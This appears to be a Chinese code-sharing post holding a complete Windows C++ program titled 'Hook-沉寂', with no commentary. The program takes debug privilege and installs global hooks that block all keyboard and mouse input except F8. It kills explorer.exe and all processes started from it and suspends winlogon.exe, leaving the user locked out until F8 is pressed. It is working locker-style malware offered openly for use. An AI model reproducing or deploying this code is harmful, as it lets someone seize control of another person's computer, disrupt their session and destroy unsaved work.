Hook-沉寂
2023-08-10 20:57:04
发布于:浙江
#include <Windows.h>
#include <TlHelp32.h>
#include <iostream>
#include <string>
using namespace std;
HHOOK g_HookKeyboard = nullptr;
HHOOK g_HookMouse = nullptr;
BOOL EnableDebugPrivilege() {
HANDLE hToken;
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
TOKEN_PRIVILEGES tokenPrivileges;
tokenPrivileges.PrivilegeCount = 1;
LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tokenPrivileges.Privileges[0].Luid);
tokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if (AdjustTokenPrivileges(hToken, FALSE, &tokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL)) {
CloseHandle(hToken);
return TRUE;
}
CloseHandle(hToken);
}
return FALSE;
}
DWORD GetExplorerProcessID() {
DWORD explorerPID = 0;
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSnapshot != INVALID_HANDLE_VALUE) {
PROCESSENTRY32 pe32;
pe32.dwSize = sizeof(PROCESSENTRY32);
if (Process32First(hSnapshot, &pe32)) {
do {
if ((string)pe32.szExeFile == (string)"explorer.exe") {
explorerPID = pe32.th32ProcessID;
break;
}
} while (Process32Next(hSnapshot, &pe32));
}
CloseHandle(hSnapshot);
}
return explorerPID;
}
void TerminateChildProcessesExceptSelf(DWORD parentPID) {
DWORD currentPID = GetCurrentProcessId();
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSnapshot != INVALID_HANDLE_VALUE) {
PROCESSENTRY32 pe32;
pe32.dwSize = sizeof(PROCESSENTRY32);
if (Process32First(hSnapshot, &pe32)) {
do {
if (pe32.th32ParentProcessID == parentPID && pe32.th32ProcessID != currentPID) {
TerminateChildProcessesExceptSelf(pe32.th32ProcessID);
HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, FALSE, pe32.th32ProcessID);
if (hProcess != NULL) {
TerminateProcess(hProcess, 0);
CloseHandle(hProcess);
}
}
} while (Process32Next(hSnapshot, &pe32));
}
CloseHandle(hSnapshot);
}
}
void SuspendWinlogonProcess() {
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSnapshot != INVALID_HANDLE_VALUE) {
PROCESSENTRY32 pe32;
pe32.dwSize = sizeof(PROCESSENTRY32);
if (Process32First(hSnapshot, &pe32)) {
do {
if ((string)pe32.szExeFile == (string)"winlogon.exe") {
HANDLE hProcess = OpenProcess(PROCESS_SUSPEND_RESUME, FALSE, pe32.th32ProcessID);
if (hProcess != NULL) {
HANDLE hThreadSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
if (hThreadSnapshot != INVALID_HANDLE_VALUE) {
THREADENTRY32 te32;
te32.dwSize = sizeof(THREADENTRY32);
if (Thread32First(hThreadSnapshot, &te32)) {
do {
if (te32.th32OwnerProcessID == pe32.th32ProcessID) {
HANDLE hThread = OpenThread(THREAD_SUSPEND_RESUME, FALSE, te32.th32ThreadID);
if (hThread != NULL) {
SuspendThread(hThread);
CloseHandle(hThread);
}
}
} while (Thread32Next(hThreadSnapshot, &te32));
}
CloseHandle(hThreadSnapshot);
}
CloseHandle(hProcess);
}
}
} while (Process32Next(hSnapshot, &pe32));
}
CloseHandle(hSnapshot);
}
}
void RestartExplorerAndResumeWinlogon() {
ShellExecute(NULL, "open", "explorer.exe", NULL, NULL, SW_SHOWDEFAULT);
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSnapshot != INVALID_HANDLE_VALUE) {
PROCESSENTRY32 pe32;
pe32.dwSize = sizeof(PROCESSENTRY32);
if (Process32First(hSnapshot, &pe32)) {
do {
if ((string)pe32.szExeFile == (string)"winlogon.exe") {
HANDLE hThreadSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
if (hThreadSnapshot != INVALID_HANDLE_VALUE) {
THREADENTRY32 te32;
te32.dwSize = sizeof(THREADENTRY32);
if (Thread32First(hThreadSnapshot, &te32)) {
do {
if (te32.th32OwnerProcessID == pe32.th32ProcessID) {
HANDLE hThread = OpenThread(THREAD_SUSPEND_RESUME, FALSE, te32.th32ThreadID);
if (hThread != NULL) {
ResumeThread(hThread);
CloseHandle(hThread);
}
}
} while (Thread32Next(hThreadSnapshot, &te32));
}
CloseHandle(hThreadSnapshot);
}
}
} while (Process32Next(hSnapshot, &pe32));
}
CloseHandle(hSnapshot);
}
}
LRESULT CALLBACK KeyboardHookProc(int nCode, WPARAM wParam, LPARAM lParam) {
if (nCode == HC_ACTION && (wParam == WM_KEYDOWN || wParam == WM_SYSKEYDOWN)) {
KBDLLHOOKSTRUCT* kbStruct = reinterpret_cast<KBDLLHOOKSTRUCT*>(lParam);
if (kbStruct->vkCode == VK_F8) {
PostQuitMessage(0);
}
return 1;
}
return CallNextHookEx(g_HookKeyboard, nCode, wParam, lParam);
}
LRESULT CALLBACK MouseHookProc(int nCode, WPARAM wParam, LPARAM lParam) {
if (nCode == HC_ACTION) {
return 1;
}
return CallNextHookEx(g_HookMouse, nCode, wParam, lParam);
}
void InstallHooks() {
g_HookKeyboard = SetWindowsHookEx(WH_KEYBOARD_LL, KeyboardHookProc, GetModuleHandle(NULL), 0);
g_HookMouse = SetWindowsHookEx(WH_MOUSE_LL, MouseHookProc, GetModuleHandle(NULL), 0);
}
void UninstallHooks() {
if (g_HookKeyboard) {
UnhookWindowsHookEx(g_HookKeyboard);
g_HookKeyboard = nullptr;
}
if (g_HookMouse) {
UnhookWindowsHookEx(g_HookMouse);
g_HookMouse = nullptr;
}
}
void TerminateAllExplorerProcesses() {
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSnapshot != INVALID_HANDLE_VALUE) {
PROCESSENTRY32 pe32;
pe32.dwSize = sizeof(PROCESSENTRY32);
if (Process32First(hSnapshot, &pe32)) {
do {
if ((string)pe32.szExeFile == (string)"explorer.exe") {
HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, FALSE, pe32.th32ProcessID);
if (hProcess != NULL) {
TerminateProcess(hProcess, 0);
CloseHandle(hProcess);
}
}
} while (Process32Next(hSnapshot, &pe32));
}
CloseHandle(hSnapshot);
}
}
int main() {
InstallHooks();
EnableDebugPrivilege();
DWORD explorerPID = GetExplorerProcessID();
if (explorerPID != 0) {
TerminateChildProcessesExceptSelf(explorerPID);
SuspendWinlogonProcess();
}
TerminateAllExplorerProcesses();
MSG msg;
while (GetMessage(&msg, NULL, 0, 0)) {
TranslateMessage(&msg);
DispatchMessage(&msg);
}
UninstallHooks();
RestartExplorerAndResumeWinlogon();
return 0;
}
这里空空如也
有帮助,赞一个